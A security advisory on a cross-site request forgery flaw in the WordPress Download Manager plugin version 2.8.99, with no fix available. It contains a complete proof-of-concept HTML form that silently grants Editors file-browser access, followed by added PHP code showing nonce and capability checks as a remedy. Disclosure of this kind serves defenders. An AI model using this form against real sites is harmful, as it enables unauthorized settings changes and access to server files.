WordPress Download Manager 2.8.99 Cross Site Request Forgery

03 Mar 2017 00:00:00 | Reported by Securify B.V. | Type: packetstorm | Source: packetstormsecurity.com

Cross-Site Request Forgery in WordPress Download Manager Plugin allows attacker to change confidential setting

Code
------------------------------------------------------------------------  
Cross-Site Request Forgery in WordPress Download Manager Plugin  
------------------------------------------------------------------------  
Burak Kelebek, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A Cross-Site Request Forgery vulnerability has been found in the  
WordPress Download Manager Plugin. By using this vulnerability an  
attacker can change confidential settings of the plugin.  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160722-0005  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on WordPress Download Manager version  
2.8.99.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
There is currently no fix available.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_download_manager_plugin.html  
  
The Download Manager plugin lacks a CSRF (nonce) token on the request that saves its settings. Because of this, an attacker is able to change confidential settings such as file browser access and the file browser base directory by luring a logged-in administrator into following a malicious link containing the proof of concept below.  
Proof of concept  
  
The proof of concept below gives file browser access to a user with Editor privileges:  
  
<html>  
<body>  
<form action="http://<target>/wp-admin/admin-ajax.php" method="POST">  
<input type="hidden" name="task" value="wdm_save_settings"/>  
<input type="hidden" name="action" value="wdm_settings"/>  
<input type="hidden" name="section" value="basic"/>  
<input type="hidden" name="wpdm_permission_msg" value="Access Denied"/>  
<input type="hidden" name="wpdm_login_msg" value="<a href='http://<target>/wp-login.php'>Please login to download</a>  
"/>  
<input type="hidden" name="_wpdm_file_browser_root" value="/srv/www/wordpress-default/"/>  
<input type="hidden" name="_wpdm_file_browser_access[]" value="editor"/>  
<input type="hidden" name="_wpdm_file_browser_access[]" value="administrator"/>  
<input type="hidden" name="__wpdm_sanitize_filename" value="0"/>  
<input type="hidden" name="__wpdm_download_speed" value="4096"/>  
<input type="hidden" name="__wpdm_download_resume" value="1"/>  
<input type="hidden" name="__wpdm_support_output_buffer" value="1"/>  
<input type="hidden" name="__wpdm_open_in_browser" value="0"/>  
<input type="hidden" name="_wpdm_recaptcha_site_key" value=""/>  
<input type="hidden" name="_wpdm_recaptcha_secret_key" value=""/>  
<input type="hidden" name="__wpdm_disable_scripts[]" value=""/>  
<input type="hidden" name="__wpdm_login_url" value=""/>  
<input type="hidden" name="__wpdm_register_url" value=""/>  
<input type="hidden" name="__wpdm_user_dashboard" value=""/>  
<input type="submit"/>  
</form>  
</body>  
</html>  
  
  
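For reference, as an added example that is not the plugin's own code: what the missing protection looks like on the WordPress side, with a nonce emitted in the settings form and verified (together with a capability check) in the `admin-ajax.php` handler. The request field names come from the proof of concept above; the hook name, nonce name and option names are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code. Hook, nonce and option names below
// (wp_ajax_wdm_settings, _wpdm_nonce, _wpdm_file_browser_*) are assumptions.

// 1) Render side: emit a nonce the browser must echo back. A cross-site form
//    like the PoC above cannot read this value, so its forged POST is rejected.
function wdm_render_settings_form() {
    echo '<form method="post" action="' . esc_url( admin_url( 'admin-ajax.php' ) ) . '">';
    echo '<input type="hidden" name="action" value="wdm_settings"/>';
    echo '<input type="hidden" name="task" value="wdm_save_settings"/>';
    // Adds a hidden input "_wpdm_nonce" bound to the current user and session.
    wp_nonce_field( 'wdm_save_settings', '_wpdm_nonce' );
    echo '<input type="submit" value="Save"/></form>';
}

// 2) Handler side: verify the nonce AND the capability before touching options.
function wdm_settings_ajax_handler() {
    // Nonce check: check_ajax_referer() terminates the request (HTTP 403) on failure.
    check_ajax_referer( 'wdm_save_settings', '_wpdm_nonce' );

    // Capability check: a nonce proves intent, not authority. Only users who may
    // manage options should be able to change who can browse server files.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    if ( ( $_POST['task'] ?? '' ) !== 'wdm_save_settings' ) {
        wp_send_json_error( array( 'message' => 'Unknown task' ), 400 );
    }

    // Validate the sensitive fields from the PoC against the site's real roles
    // instead of storing whatever the request carries.
    $allowed_roles = array_keys( wp_roles()->roles );
    $roles = array_map( 'sanitize_key', (array) ( $_POST['_wpdm_file_browser_access'] ?? array() ) );
    $roles = array_values( array_intersect( $roles, $allowed_roles ) );

    $root = wp_normalize_path( sanitize_text_field( wp_unslash( $_POST['_wpdm_file_browser_root'] ?? '' ) ) );

    update_option( '_wpdm_file_browser_access', $roles );
    update_option( '_wpdm_file_browser_root', $root );

    wp_send_json_success( array( 'access' => $roles, 'root' => $root ) );
}

// Registered for authenticated users only; deliberately no wp_ajax_nopriv_ hook.
add_action( 'wp_ajax_wdm_settings', 'wdm_settings_ajax_handler' );
```

When reviewing a plugin for this class of bug, the check is simply that every state-changing `wp_ajax_*` and `admin_post_*` handler calls `check_ajax_referer()`/`check_admin_referer()` (or `wp_verify_nonce()`) and `current_user_can()` before it writes.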
------------------------------------------------------------------------  
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its  
goal is to contribute to the security of popular, widely used OSS  
projects in a fun and educational way.  
